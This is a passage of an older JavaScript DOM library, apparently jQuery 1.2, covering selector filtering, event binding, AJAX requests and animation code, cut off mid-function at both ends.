                                r = D.merge(r, d[i].getElementsByTagName(a))
                            }
                            if (m[1] == ".") r = D.classFilter(r, m[2]);
                            if (m[1] == "#") {
                                var e = [];
                                for (var i = 0; r[i]; i++) if (r[i].getAttribute("id") == m[2]) {
                                    e = [r[i]];
                                    break
                                }
                                r = e
                            }
                            d = r
                        }
                        t = t.replace(h, "")
                    }
                }
                if (t) {
                    var b = D.filter(t, r);
                    d = r = b.r;
                    t = D.trim(b.t)
                }
            }
            if (t) d = [];
            if (d && o == d[0]) d.shift();
            done = D.merge(done, d);
            return done
        },
        classFilter: function(r, m, a) {
            m = " " + m + " ";
            var c = [];
            for (var i = 0; r[i]; i++) {
                var b = (" " + r[i].className + " ").indexOf(m) >= 0;
                if (!a && b || a && !b) c.push(r[i])
            }
            return c
        },
        filter: function(t, r, h) {
            var d;
            while (t && t != d) {
                d = t;
                var p = D.parse,
                    m;
                for (var i = 0; p[i]; i++) {
                    m = p[i].exec(t);
                    if (m) {
                        t = t.substring(m[0].length);
                        m[2] = m[2].replace(/\\/g, "");
                        break
                    }
                }
                if (!m) break;
                if (m[1] == ":" && m[2] == "not") r = isSimple.test(m[3]) ? D.filter(m[3], r, true).r : D(r).not(m[3]);
                else if (m[1] == ".") r = D.classFilter(r, m[2], h);
                else if (m[1] == "[") {
                    var g = [],
                        type = m[3];
                    for (var i = 0, rl = r.length; i < rl; i++) {
                        var a = r[i],
                            z = a[D.props[m[2]] || m[2]];
                        if (z == null || /href|src|selected/.test(m[2])) z = D.attr(a, m[2]) || '';
                        if ((type == "" && !! z || type == "=" && z == m[5] || type == "!=" && z != m[5] || type == "^=" && z && !z.indexOf(m[5]) || type == "$=" && z.substr(z.length - m[5].length) == m[5] || (type == "*=" || type == "~=") && z.indexOf(m[5]) >= 0) ^ h) g.push(a)
                    }
                    r = g
                } else if (m[1] == ":" && m[2] == "nth-child") {
                    var e = {},
                        g = [],
                        test = /(-?)(\d*)n((?:\+|-)?\d*)/.exec(m[3] == "even" && "2n" || m[3] == "odd" && "2n+1" || !/\D/.test(m[3]) && "0n+" + m[3] || m[3]),
                        first = (test[1] + (test[2] || 1)) - 0,
                        d = test[3] - 0;
                    for (var i = 0, rl = r.length; i < rl; i++) {
                        var j = r[i],
                            parentNode = j.parentNode,
                            id = D.data(parentNode);
                        if (!e[id]) {
                            var c = 1;
                            for (var n = parentNode.firstChild; n; n = n.nextSibling) if (n.nodeType == 1) n.nodeIndex = c++;
                            e[id] = true
                        }
                        var b = false;
                        if (first == 0) {
                            if (j.nodeIndex == d) b = true
                        } else if ((j.nodeIndex - d) % first == 0 && (j.nodeIndex - d) / first >= 0) b = true;
                        if (b ^ h) g.push(j)
                    }
                    r = g
                } else {
                    var f = D.expr[m[1]];
                    if (typeof f == "object") f = f[m[2]];
                    if (typeof f == "string") f = eval("false||function(a,i){return " + f + ";}");
                    r = D.grep(r, function(a, i) {
                        return f(a, i, m, r)
                    }, h)
                }
            }
            return {
                r: r,
                t: t
            }
        },
        dir: function(b, c) {
            var a = [],
                cur = b[c];
            while (cur && cur != document) {
                if (cur.nodeType == 1) a.push(cur);
                cur = cur[c]
            }
            return a
        },
        nth: function(a, e, c, b) {
            e = e || 1;
            var d = 0;
            for (; a; a = a[c]) if (a.nodeType == 1 && ++d == e) break;
            return a
        },
        sibling: function(n, a) {
            var r = [];
            for (; n; n = n.nextSibling) {
                if (n.nodeType == 1 && n != a) r.push(n)
            }
            return r
        }
    });
    D.event = {
        add: function(f, i, g, e) {
            if (f.nodeType == 3 || f.nodeType == 8) return;
            if (D.browser.msie && f.setInterval) f = window;
            if (!g.guid) g.guid = this.guid++;
            if (e != undefined) {
                var h = g;
                g = this.proxy(h, function() {
                    return h.apply(this, arguments)
                });
                g.data = e
            }
            var j = D.data(f, "events") || D.data(f, "events", {}),
                handle = D.data(f, "handle") || D.data(f, "handle", function() {
                    if (typeof D != "undefined" && !D.event.triggered) return D.event.handle.apply(arguments.callee.elem, arguments)
                });
            handle.elem = f;
            D.each(i.split(/\s+/), function(c, b) {
                var a = b.split(".");
                b = a[0];
                g.type = a[1];
                var d = j[b];
                if (!d) {
                    d = j[b] = {};
                    if (!D.event.special[b] || D.event.special[b].setup.call(f) === false) {
                        if (f.addEventListener) f.addEventListener(b, handle, false);
                        else if (f.attachEvent) f.attachEvent("on" + b, handle)
                    }
                }
                d[g.guid] = g;
                D.event.global[b] = true
            });
            f = null
        },
        guid: 1,
        global: {},
        remove: function(e, h, f) {
            if (e.nodeType == 3 || e.nodeType == 8) return;
            var i = D.data(e, "events"),
                ret, index;
            if (i) {
                if (h == undefined || (typeof h == "string" && h.charAt(0) == ".")) for (var g in i) this.remove(e, g + (h || ""));
                else {
                    if (h.type) {
                        f = h.handler;
                        h = h.type
                    }
                    D.each(h.split(/\s+/), function(b, a) {
                        var c = a.split(".");
                        a = c[0];
                        if (i[a]) {
                            if (f) delete i[a][f.guid];
                            else for (f in i[a]) if (!c[1] || i[a][f].type == c[1]) delete i[a][f];
                            for (ret in i[a]) break;
                            if (!ret) {
                                if (!D.event.special[a] || D.event.special[a].teardown.call(e) === false) {
                                    if (e.removeEventListener) e.removeEventListener(a, D.data(e, "handle"), false);
                                    else if (e.detachEvent) e.detachEvent("on" + a, D.data(e, "handle"))
                                }
                                ret = null;
                                delete i[a]
                            }
                        }
                    })
                }
                for (ret in i) break;
                if (!ret) {
                    var d = D.data(e, "handle");
                    if (d) d.elem = null;
                    D.removeData(e, "events");
                    D.removeData(e, "handle")
                }
            }
        },
        trigger: function(h, c, f, g, i) {
            c = D.makeArray(c);
            if (h.indexOf("!") >= 0) {
                h = h.slice(0, -1);
                var a = true
            }
            if (!f) {
                if (this.global[h]) D("*").add([window, document]).trigger(h, c)
            } else {
                if (f.nodeType == 3 || f.nodeType == 8) return undefined;
                var b, ret, fn = D.isFunction(f[h] || null),
                    event = !c[0] || !c[0].preventDefault;
                if (event) {
                    c.unshift({
                        type: h,
                        target: f,
                        preventDefault: function() {},
                        stopPropagation: function() {},
                        timeStamp: now()
                    });
                    c[0][E] = true
                }
                c[0].type = h;
                if (a) c[0].exclusive = true;
                var d = D.data(f, "handle");
                if (d) b = d.apply(f, c);
                if ((!fn || (D.nodeName(f, 'a') && h == "click")) && f["on" + h] && f["on" + h].apply(f, c) === false) b = false;
                if (event) c.shift();
                if (i && D.isFunction(i)) {
                    ret = i.apply(f, b == null ? c : c.concat(b));
                    if (ret !== undefined) b = ret
                }
                if (fn && g !== false && b !== false && !(D.nodeName(f, 'a') && h == "click")) {
                    this.triggered = true;
                    try {
                        f[h]()
                    } catch (e) {}
                }
                this.triggered = false
            }
            return b
        },
        handle: function(b) {
            var a, ret, namespace, all, handlers;
            b = arguments[0] = D.event.fix(b || window.event);
            namespace = b.type.split(".");
            b.type = namespace[0];
            namespace = namespace[1];
            all = !namespace && !b.exclusive;
            handlers = (D.data(this, "events") || {})[b.type];
            for (var j in handlers) {
                var c = handlers[j];
                if (all || c.type == namespace) {
                    b.handler = c;
                    b.data = c.data;
                    ret = c.apply(this, arguments);
                    if (a !== false) a = ret;
                    if (ret === false) {
                        b.preventDefault();
                        b.stopPropagation()
                    }
                }
            }
            return a
        },
        fix: function(b) {
            if (b[E] == true) return b;
            var d = b;
            b = {
                originalEvent: d
            };
            var c = "altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode metaKey newValue originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target timeStamp toElement type view wheelDelta which".split(" ");
            for (var i = c.length; i; i--) b[c[i]] = d[c[i]];
            b[E] = true;
            b.preventDefault = function() {
                if (d.preventDefault) d.preventDefault();
                d.returnValue = false
            };
            b.stopPropagation = function() {
                if (d.stopPropagation) d.stopPropagation();
                d.cancelBubble = true
            };
            b.timeStamp = b.timeStamp || now();
            if (!b.target) b.target = b.srcElement || document;
            if (b.target.nodeType == 3) b.target = b.target.parentNode;
            if (!b.relatedTarget && b.fromElement) b.relatedTarget = b.fromElement == b.target ? b.toElement : b.fromElement;
            if (b.pageX == null && b.clientX != null) {
                var a = document.documentElement,
                    body = document.body;
                b.pageX = b.clientX + (a && a.scrollLeft || body && body.scrollLeft || 0) - (a.clientLeft || 0);
                b.pageY = b.clientY + (a && a.scrollTop || body && body.scrollTop || 0) - (a.clientTop || 0)
            }
            if (!b.which && ((b.charCode || b.charCode === 0) ? b.charCode : b.keyCode)) b.which = b.charCode || b.keyCode;
            if (!b.metaKey && b.ctrlKey) b.metaKey = b.ctrlKey;
            if (!b.which && b.button) b.which = (b.button & 1 ? 1 : (b.button & 2 ? 3 : (b.button & 4 ? 2 : 0)));
            return b
        },
        proxy: function(a, b) {
            b.guid = a.guid = a.guid || b.guid || this.guid++;
            return b
        },
        special: {
            ready: {
                setup: function() {
                    bindReady();
                    return
                },
                teardown: function() {
                    return
                }
            },
            mouseenter: {
                setup: function() {
                    if (D.browser.msie) return false;
                    D(this).bind("mouseover", D.event.special.mouseenter.handler);
                    return true
                },
                teardown: function() {
                    if (D.browser.msie) return false;
                    D(this).unbind("mouseover", D.event.special.mouseenter.handler);
                    return true
                },
                handler: function(a) {
                    if (F(a, this)) return true;
                    a.type = "mouseenter";
                    return D.event.handle.apply(this, arguments)
                }
            },
            mouseleave: {
                setup: function() {
                    if (D.browser.msie) return false;
                    D(this).bind("mouseout", D.event.special.mouseleave.handler);
                    return true
                },
                teardown: function() {
                    if (D.browser.msie) return false;
                    D(this).unbind("mouseout", D.event.special.mouseleave.handler);
                    return true
                },
                handler: function(a) {
                    if (F(a, this)) return true;
                    a.type = "mouseleave";
                    return D.event.handle.apply(this, arguments)
                }
            }
        }
    };
    D.fn.extend({
        bind: function(c, a, b) {
            return c == "unload" ? this.one(c, a, b) : this.each(function() {
                D.event.add(this, c, b || a, b && a)
            })
        },
        one: function(d, b, c) {
            var e = D.event.proxy(c || b, function(a) {
                D(this).unbind(a, e);
                return (c || b).apply(this, arguments)
            });
            return this.each(function() {
                D.event.add(this, d, e, c && b)
            })
        },
        unbind: function(a, b) {
            return this.each(function() {
                D.event.remove(this, a, b)
            })
        },
        trigger: function(c, a, b) {
            return this.each(function() {
                D.event.trigger(c, a, this, true, b)
            })
        },
        triggerHandler: function(c, a, b) {
            return this[0] && D.event.trigger(c, a, this[0], false, b)
        },
        toggle: function(b) {
            var c = arguments,
                i = 1;
            while (i < c.length) D.event.proxy(b, c[i++]);
            return this.click(D.event.proxy(b, function(a) {
                this.lastToggle = (this.lastToggle || 0) % i;
                a.preventDefault();
                return c[this.lastToggle++].apply(this, arguments) || false
            }))
        },
        hover: function(a, b) {
            return this.bind('mouseenter', a).bind('mouseleave', b)
        },
        ready: function(a) {
            bindReady();
            if (D.isReady) a.call(document, D);
            else D.readyList.push(function() {
                return a.call(this, D)
            });
            return this
        }
    });
    D.extend({
        isReady: false,
        readyList: [],
        ready: function() {
            if (!D.isReady) {
                D.isReady = true;
                if (D.readyList) {
                    D.each(D.readyList, function() {
                        this.call(document)
                    });
                    D.readyList = null
                }
                D(document).triggerHandler("ready")
            }
        }
    });
    var x = false;

    function bindReady() {
        if (x) return;
        x = true;
        if (document.addEventListener && !D.browser.opera) document.addEventListener("DOMContentLoaded", D.ready, false);
        if (D.browser.msie && window == top)(function() {
            if (D.isReady) return;
            try {
                document.documentElement.doScroll("left")
            } catch (error) {
                setTimeout(arguments.callee, 0);
                return
            }
            D.ready()
        })();
        if (D.browser.opera) document.addEventListener("DOMContentLoaded", function() {
            if (D.isReady) return;
            for (var i = 0; i < document.styleSheets.length; i++) if (document.styleSheets[i].disabled) {
                setTimeout(arguments.callee, 0);
                return
            }
            D.ready()
        }, false);
        if (D.browser.safari) {
            var a;
            (function() {
                if (D.isReady) return;
                if (document.readyState != "loaded" && document.readyState != "complete") {
                    setTimeout(arguments.callee, 0);
                    return
                }
                if (a === undefined) a = D("style, link[rel=stylesheet]").length;
                if (document.styleSheets.length != a) {
                    setTimeout(arguments.callee, 0);
                    return
                }
                D.ready()
            })()
        }
        D.event.add(window, "load", D.ready)
    }
    D.each(("blur,focus,load,resize,scroll,unload,click,dblclick," + "mousedown,mouseup,mousemove,mouseover,mouseout,change,select," + "submit,keydown,keypress,keyup,error").split(","), function(i, b) {
        D.fn[b] = function(a) {
            return a ? this.bind(b, a) : this.trigger(b)
        }
    });
    var F = function(a, c) {
            var b = a.relatedTarget;
            while (b && b != c) try {
                b = b.parentNode
            } catch (error) {
                b = c
            }
            return b == c
        };
    D(window).bind("unload", function() {
        D("*").add(document).unbind()
    });
    D.fn.extend({
        _load: D.fn.load,
        load: function(g, d, c) {
            if (typeof g != 'string') return this._load(g);
            var e = g.indexOf(" ");
            if (e >= 0) {
                var i = g.slice(e, g.length);
                g = g.slice(0, e)
            }
            c = c ||
            function() {};
            var f = "GET";
            if (d) if (D.isFunction(d)) {
                c = d;
                d = null
            } else {
                d = D.param(d);
                f = "POST"
            }
            var h = this;
            D.ajax({
                url: g,
                type: f,
                dataType: "html",
                data: d,
                complete: function(a, b) {
                    if (b == "success" || b == "notmodified") h.html(i ? D("<div/>").append(a.responseText.replace(/<script(.|\s)*?\/script>/g, "")).find(i) : a.responseText);
                    h.each(c, [a.responseText, b, a])
                }
            });
            return this
        },
        serialize: function() {
            return D.param(this.serializeArray())
        },
        serializeArray: function() {
            return this.map(function() {
                return D.nodeName(this, "form") ? D.makeArray(this.elements) : this
            }).filter(function() {
                return this.name && !this.disabled && (this.checked || /select|textarea/i.test(this.nodeName) || /text|hidden|password/i.test(this.type))
            }).map(function(i, c) {
                var b = D(this).val();
                return b == null ? null : b.constructor == Array ? D.map(b, function(a, i) {
                    return {
                        name: c.name,
                        value: a
                    }
                }) : {
                    name: c.name,
                    value: b
                }
            }).get()
        }
    });
    D.each("ajaxStart,ajaxStop,ajaxComplete,ajaxError,ajaxSuccess,ajaxSend".split(","), function(i, o) {
        D.fn[o] = function(f) {
            return this.bind(o, f)
        }
    });
    var B = now();
    D.extend({
        get: function(d, b, a, c) {
            if (D.isFunction(b)) {
                a = b;
                b = null
            }
            return D.ajax({
                type: "GET",
                url: d,
                data: b,
                success: a,
                dataType: c
            })
        },
        getScript: function(b, a) {
            return D.get(b, null, a, "script")
        },
        getJSON: function(c, b, a) {
            return D.get(c, b, a, "json")
        },
        post: function(d, b, a, c) {
            if (D.isFunction(b)) {
                a = b;
                b = {}
            }
            return D.ajax({
                type: "POST",
                url: d,
                data: b,
                success: a,
                dataType: c
            })
        },
        ajaxSetup: function(a) {
            D.extend(D.ajaxSettings, a)
        },
        ajaxSettings: {
            url: location.href,
            global: true,
            type: "GET",
            timeout: 0,
            contentType: "application/x-www-form-urlencoded",
            processData: true,
            async: true,
            data: null,
            username: null,
            password: null,
            accepts: {
                xml: "application/xml, text/xml",
                html: "text/html",
                script: "text/javascript, application/javascript",
                json: "application/json, text/javascript",
                text: "text/plain",
                _default: "*/*"
            }
        },
        lastModified: {},
        ajax: function(s) {
            s = D.extend(true, s, D.extend(true, {}, D.ajaxSettings, s));
            var g, jsre = /=\?(&|$)/g,
                status, data, type = s.type.toUpperCase();
            if (s.data && s.processData && typeof s.data != "string") s.data = D.param(s.data);
            if (s.dataType == "jsonp") {
                if (type == "GET") {
                    if (!s.url.match(jsre)) s.url += (s.url.match(/\?/) ? "&" : "?") + (s.jsonp || "callback") + "=?"
                } else if (!s.data || !s.data.match(jsre)) s.data = (s.data ? s.data + "&" : "") + (s.jsonp || "callback") + "=?";
                s.dataType = "json"
            }
            if (s.dataType == "json" && (s.data && s.data.match(jsre) || s.url.match(jsre))) {
                g = "jsonp" + B++;
                if (s.data) s.data = (s.data + "").replace(jsre, "=" + g + "$1");
                s.url = s.url.replace(jsre, "=" + g + "$1");
                s.dataType = "script";
                window[g] = function(a) {
                    data = a;
                    success();
                    complete();
                    window[g] = undefined;
                    try {
                        delete window[g]
                    } catch (e) {}
                    if (i) i.removeChild(h)
                }
            }
            if (s.dataType == "script" && s.cache == null) s.cache = false;
            if (s.cache === false && type == "GET") {
                var j = now();
                var k = s.url.replace(/(\?|&)_=.*?(&|$)/, "$1_=" + j + "$2");
                s.url = k + ((k == s.url) ? (s.url.match(/\?/) ? "&" : "?") + "_=" + j : "")
            }
            if (s.data && type == "GET") {
                s.url += (s.url.match(/\?/) ? "&" : "?") + s.data;
                s.data = null
            }
            if (s.global && !D.active++) D.event.trigger("ajaxStart");
            var n = /^(?:\w+:)?\/\/([^\/?#]+)/;
            if (s.dataType == "script" && type == "GET" && n.test(s.url) && n.exec(s.url)[1] != location.host) {
                var i = document.getElementsByTagName("head")[0];
                var h = document.createElement("script");
                h.src = s.url;
                if (s.scriptCharset) h.charset = s.scriptCharset;
                if (!g) {
                    var l = false;
                    h.onload = h.onreadystatechange = function() {
                        if (!l && (!this.readyState || this.readyState == "loaded" || this.readyState == "complete")) {
                            l = true;
                            success();
                            complete();
                            i.removeChild(h)
                        }
                    }
                }
                i.appendChild(h);
                return undefined
            }
            var m = false;
            var c = window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
            if (s.username) c.open(type, s.url, s.async, s.username, s.password);
            else c.open(type, s.url, s.async);
            try {
                if (s.data) c.setRequestHeader("Content-Type", s.contentType);
                if (s.ifModified) c.setRequestHeader("If-Modified-Since", D.lastModified[s.url] || "Thu, 01 Jan 1970 00:00:00 GMT");
                c.setRequestHeader("X-Requested-With", "XMLHttpRequest");
                c.setRequestHeader("Accept", s.dataType && s.accepts[s.dataType] ? s.accepts[s.dataType] + ", */*" : s.accepts._default)
            } catch (e) {}
            if (s.beforeSend && s.beforeSend(c, s) === false) {
                s.global && D.active--;
                c.abort();
                return false
            }
            if (s.global) D.event.trigger("ajaxSend", [c, s]);
            var d = function(a) {
                    if (!m && c && (c.readyState == 4 || a == "timeout")) {
                        m = true;
                        if (f) {
                            clearInterval(f);
                            f = null
                        }
                        status = a == "timeout" && "timeout" || !D.httpSuccess(c) && "error" || s.ifModified && D.httpNotModified(c, s.url) && "notmodified" || "success";
                        if (status == "success") {
                            try {
                                data = D.httpData(c, s.dataType, s.dataFilter)
                            } catch (e) {
                                status = "parsererror"
                            }
                        }
                        if (status == "success") {
                            var b;
                            try {
                                b = c.getResponseHeader("Last-Modified")
                            } catch (e) {}
                            if (s.ifModified && b) D.lastModified[s.url] = b;
                            if (!g) success()
                        } else D.handleError(s, c, status);
                        complete();
                        if (s.async) c = null
                    }
                };
            if (s.async) {
                var f = setInterval(d, 13);
                if (s.timeout > 0) setTimeout(function() {
                    if (c) {
                        c.abort();
                        if (!m) d("timeout")
                    }
                }, s.timeout)
            }
            try {
                c.send(s.data)
            } catch (e) {
                D.handleError(s, c, null, e)
            }
            if (!s.async) d();

            function success() {
                if (s.success) s.success(data, status);
                if (s.global) D.event.trigger("ajaxSuccess", [c, s])
            }
            function complete() {
                if (s.complete) s.complete(c, status);
                if (s.global) D.event.trigger("ajaxComplete", [c, s]);
                if (s.global && !--D.active) D.event.trigger("ajaxStop")
            }
            return c
        },
        handleError: function(s, a, b, e) {
            if (s.error) s.error(a, b, e);
            if (s.global) D.event.trigger("ajaxError", [a, s, e])
        },
        active: 0,
        httpSuccess: function(a) {
            try {
                return !a.status && location.protocol == "file:" || (a.status >= 200 && a.status < 300) || a.status == 304 || a.status == 1223 || D.browser.safari && a.status == undefined
            } catch (e) {}
            return false
        },
        httpNotModified: function(a, c) {
            try {
                var b = a.getResponseHeader("Last-Modified");
                return a.status == 304 || b == D.lastModified[c] || D.browser.safari && a.status == undefined
            } catch (e) {}
            return false
        },
        httpData: function(a, c, b) {
            var d = a.getResponseHeader("content-type"),
                xml = c == "xml" || !c && d && d.indexOf("xml") >= 0,
                data = xml ? a.responseXML : a.responseText;
            if (xml && data.documentElement.tagName == "parsererror") throw "parsererror";
            if (b) data = b(data, c);
            if (c == "script") D.globalEval(data);
            if (c == "json") data = eval("(" + data + ")");
            return data
        },
        param: function(a) {
            var s = [];
            if (a.constructor == Array || a.jquery) D.each(a, function() {
                s.push(encodeURIComponent(this.name) + "=" + encodeURIComponent(this.value))
            });
            else for (var j in a) if (a[j] && a[j].constructor == Array) D.each(a[j], function() {
                s.push(encodeURIComponent(j) + "=" + encodeURIComponent(this))
            });
            else s.push(encodeURIComponent(j) + "=" + encodeURIComponent(D.isFunction(a[j]) ? a[j]() : a[j]));
            return s.join("&").replace(/%20/g, "+")
        }
    });
    D.fn.extend({
        show: function(c, b) {
            return c ? this.animate({
                height: "show",
                width: "show",
                opacity: "show"
            }, c, b) : this.filter(":hidden").each(function() {
                this.style.display = this.oldblock || "";
                if (D.css(this, "display") == "none") {
                    var a = D("<" + this.tagName + " />").appendTo("body");
                    this.style.display = a.css("display");
                    if (this.style.display == "none") this.style.display = "block";
                    a.remove()
                }
            }).end()
        },
        hide: function(b, a) {
            return b ? this.animate({
                height: "hide",
                width: "hide",
                opacity: "hide"
            }, b, a) : this.filter(":visible").each(function() {
                this.oldblock = this.oldblock || D.css(this, "display");
                this.style.display = "none"
            }).end()
        },
        _toggle: D.fn.toggle,
        toggle: function(a, b) {
            return D.isFunction(a) && D.isFunction(b) ? this._toggle.apply(this, arguments) : a ? this.animate({
                height: "toggle",
                width: "toggle",
                opacity: "toggle"
            }, a, b) : this.each(function() {
                D(this)[D(this).is(":hidden") ? "show" : "hide"]()
            })
        },
        slideDown: function(b, a) {
            return this.animate({
                height: "show"
            }, b, a)
        },
        slideUp: function(b, a) {
            return this.animate({
                height: "hide"
            }, b, a)
        },
        slideToggle: function(b, a) {
            return this.animate({
                height: "toggle"
            }, b, a)
        },
        fadeIn: function(b, a) {
            return this.animate({
                opacity: "show"
            }, b, a)
        },
        fadeOut: function(b, a) {
            return this.animate({
                opacity: "hide"
            }, b, a)
        },
        fadeTo: function(c, a, b) {
            return this.animate({
                opacity: a
            }, c, b)
        },
        animate: function(k, j, i, g) {
            var h = D.speed(j, i, g);
            return this[h.queue === false ? "each" : "queue"](function() {
                if (this.nodeType != 1) return false;
                var f = D.extend({}, h),
                    p, hidden = D(this).is(":hidden"),
                    self = this;
                for (p in k) {
                    if (k[p] == "hide" && hidden || k[p] == "show" && !hidden) return f.complete.call(this);
                    if (p == "height" || p == "width") {
                        f.display = D.css(this, "display");
                        f.overflow = this.style.overflow
                    }
                }
                if (f.overflow != null) this.style.overflow = "hidden";
                f.curAnim = D.extend({}, k);
                D.each(k, function(c, a) {
                    var e = new D.fx(self, f, c);
                    if (/toggle|show|hide/.test(a)) e[a == "toggle" ? hidden ? "show" : "hide" : a](k);
                    else {
                        var b = a.toString().match(/^([+-]=)?([\d+-.]+)(.*)$/),
                            start = e.cur(true) || 0;
                        if (b) {
                            var d = parseFloat(b[2]),
                                unit = b[3] || "px";
                            if (unit != "px") {
                                self.style[c] = (d || 1) + unit;
                                start = ((d || 1) / e.cur(true)) * start;
                                self.style[c] = start + unit
                            }
                            if (b[1]) d = ((b[1] == "-=" ? -1 : 1) * d) + start;
                            e.custom(start, d, unit)
                        } else e.custom(start, a, "")
                    }
                });
                return true
            })
        },
        queue: function(a, b) {
            if (D.isFunction(a) || (a && a.constructor == Array)) {
                b = a;
                a = "fx"
            }
            if (!a || (typeof a == "string" && !b)) return A(this[0], a);
            return this.each(function() {
                if (b.constructor == Array) A(this, a, b);
                else {
                    A(this, a).push(b);
                    if (A(this, a).length == 1) b.call(this)
                }
            })
        },
        stop: function(b, c) {
            var a = D.timers;
            if (b) this.queue([]);
            this.each(function() {
                for (var i = a.length - 1; i >= 0; i--) if (a[i].elem == this) {
                    if (c) a[i](true);
                    a.splice(i, 1)
                }
            });
            if (!c) this.dequeue();
            return this
        }
    });
    var A = function(b, c, a) {
            if (b) {
                c = c || "fx";
                var q = D.data(b, c + "queue");
                if (!q || a) q = D.data(b, c + "queue", D.makeArray(a))
            }
            return q
        };
    D.fn.dequeue = function(a) {
        a = a || "fx";
        return this.each(function() {
            var q = A(this, a);
            q.shift();
            if (q.length) q[0].call(this)
        })
    };
    D.extend({
        speed: function(b, a, c) {
            var d = b && b.constructor == Object ? b : {
                complete: c || !c && a || D.isFunction(b) && b,
                duration: b,
                easing: c && a || a && a.constructor != Function && a
            };
            d.duration = (d.duration && d.duration.constructor == Number ? d.duration : D.fx.speeds[d.duration]) || D.fx.speeds.def;
            d.old = d.complete;
            d.complete = function() {
                if (d.queue !== false) D(this).dequeue();
                if (D.isFunction(d.old)) d.old.call(this)
            };
            return d
        },
        easing: {
            linear: function(p, n, b, a) {
                return b + a * p
            },
            swing: function(p, n, b, a) {
                return ((-Math.cos(p * Math.PI) / 2) + 0.5) * a + b
            }
        },
        timers: [],
        timerId: null,
        fx: function(b, c, a) {
            this.options = c;
            this.elem = b;
            this.prop = a;
            if (!c.orig) c.orig = {}
        }
    });
    D.fx.prototype = {
        update: function() {
            if (this.options.step) this.options.step.call(this.elem, this.now, this);
            (D.fx.step[this.prop] || D.fx.step._default)(this);
            if (this.prop == "height" || this.prop == "width") this.elem.style.display = "block"
        },
        cur: function(a) {
            if (this.elem[this.prop] != null && this.elem.style[this.prop] == null) return this.elem[this.prop];
            var r = parseFloat(D.css(this.elem, this.prop, a));
            return r && r > -10000 ? r : parseFloat(D.curCSS(this.elem, this.prop)) || 0
        },
        custom: function(c, b, d) {
            this.startTime = now();
            this.start = c;
            this.end = b;
            this.unit = d || this.unit || "px";
            this.now = this.start;
            this.pos = this.state = 0;
            this.update();
            var e = this;

            function t(a) {
                return e.step(a)
            }
            t.elem = this.elem;
            D.timers.push(t);
            if (D.timerId == null) {
                D.timerId = setInterval(function() {
                    var a = D.timers;
                    for (var i = 0; i < a.length; i++) if (!a[i]()) a.splice(i--, 1);
                    if (!a.length) {
                        clearInterval(D.timerId);
                        D.timerId = null
                    }
                }, 13)
            }
        },
        show: function() {
            this.options.orig[this.prop] = D.attr(this.elem.style, this.prop);
            this.options.show = true;
            this.custom(0, this.cur());
            if (this.prop == "width" || this.prop == "height") this.elem.style[this.prop] = "1px";
            D(this.elem).show()
        },
        hide: function() {
            this.options.orig[this.prop] = D.attr(this.elem.style, this.prop);
            this.options.hide = true;
            this.custom(this.cur(), 0)
        },
        step: function(a) {
            var t = now();
            if (a || t > this.options.duration + this.startTime) {
                this.now = this.end;
                this.pos = this.state = 1;
                this.update();
                this.options.curAnim[this.prop] = true;
                var b = true;
                for (var i in this.options.curAnim) if (this.options.curAnim[i] !== true) b = false;
                if (b) {
                    if (this.options.display != null) {
                        this.elem.style.overflow = this.options.overflow;
                        this.elem.style.display = this.options.display;
                        if (D.css(this.elem, "display") == "none") this.elem.style.display = "block"
                    }
                    if (this.options.hide) this.elem.style.display = "none";
                    if (this.options.hide || this.options.show) for (var p in this.options.curAnim) D.attr(this.elem.style, p, this.options.orig[p])
                }
                if (b) this.options.complete.call(this.elem);
                return false
            } else {
                var n = t - this.startTime;
                this.state = n / this.options.duration;
                this.pos = D.easing[this.options.easing || (D.easing.swing ? "swing" : "linear")](this.state, n, 0, 1, this.options.duration);
                this.now = this.start + ((this.end - this.start) * this.pos);
                this.update()
            }
            return true
        }
    };
    D.extend(D.fx, {
        speeds: {
            slow: 600,
            fast: 200,
            def: 400
        },
        step: {
            scrollLeft: function(a) {
                a.elem.scrollLeft = a.now
            },
            scrollTop: function(a) {
                a.elem.scrollTop = a.now
            },
            opacity: function(a) {
                D.attr(a.elem.style, "opacity", a.now)
            },
            _default: function(a) {
                a.elem.style[a.prop] = a.now + a.unit
            }
        }
    });
    D.fn.offset = function() {
        var b = 0,
            top = 0,
            elem = this[0],
            results;
        if (elem) with(D.browser) {
            var d = elem.parentNode,
                offsetChild = elem,
                offsetParent = elem.offsetParent,
                doc = elem.ownerDocument,
                safari2 = safari && parseInt(version) < 522 && !/adobeair/i.test(v),
                css = D.curCSS,
                fixed = css(elem, "position") == "fixed";
            if (elem.getBoundingClientRect) {
                var c = elem.getBoundingClientRect();
                add(c.left + Math.max(doc.documentElement.scrollLeft, doc.body.scrollLeft), c.top + Math.max(doc.documentElement.scrollTop, doc.body.scrollTop));
                add(-doc.documentElement.clientLeft, -doc.documentElement.clientTop)
            } else {
                add(elem.offsetLeft, elem.offsetTop);
                while (offsetParent) {
                    add(offsetParent.offsetLeft, offsetParent.offsetTop);
                    if (mozilla && !/^t(able|d|h)$/i.test(offsetParent.tagName) || safari && !safari2) border(offsetParent);
                    if (!fixed && css(offsetParent, "position") == "fixed") fixed = true;
                    offsetChild = /^body$/i.test(offsetParent.tagName) ? offsetChild : offsetParent;
                    offsetParent = offsetParent.offsetParent
                }
                while (d && d.tagName && !/^body|html$/i.test(d.tagName)) {
                    if (!/^inline|table.*$/i.test(css(d, "display"))) add(-d.scrollLeft, -d.scrollTop);
                    if (mozilla && css(d, "overflow") != "visible") border(d);
                    d = d.parentNode
                }
                if ((safari2 && (fixed || css(offsetChild, "position") == "absolute")) || (mozilla && css(offsetChild, "position") != "absolute")) add(-doc.body.offsetLeft, -doc.body.offsetTop);
                if (fixed) add(Math.max(doc.documentElement.scrollLeft, doc.body.scrollLeft), Math.max(doc.documentElement.scrollTop, doc.body.scrollTop))
            }
            results = {
                top: top,
                left: b
            }
        }
        function border(a) {
            add(D.curCSS(a, "borderLeftWidth", true), D.curCSS(a, "borderTopWidth", true))
        }
        function add(l, t) {
            b += parseInt(l, 10) || 0;
            top += parseInt(t, 10) || 0
        }
        return results
    };
    D.fn.extend({
        position: function() {
            var a = 0,
                top = 0,
                results;
            if (this[0]) {
                var b = this.offsetParent(),
                    offset = this.offset(),
                    parentOffset = /^body|html$/i.test(b[0].tagName) ? {
                        top: 0,
                        left: 0
                    } : b.offset();
                offset.top -= num(this, 'marginTop');
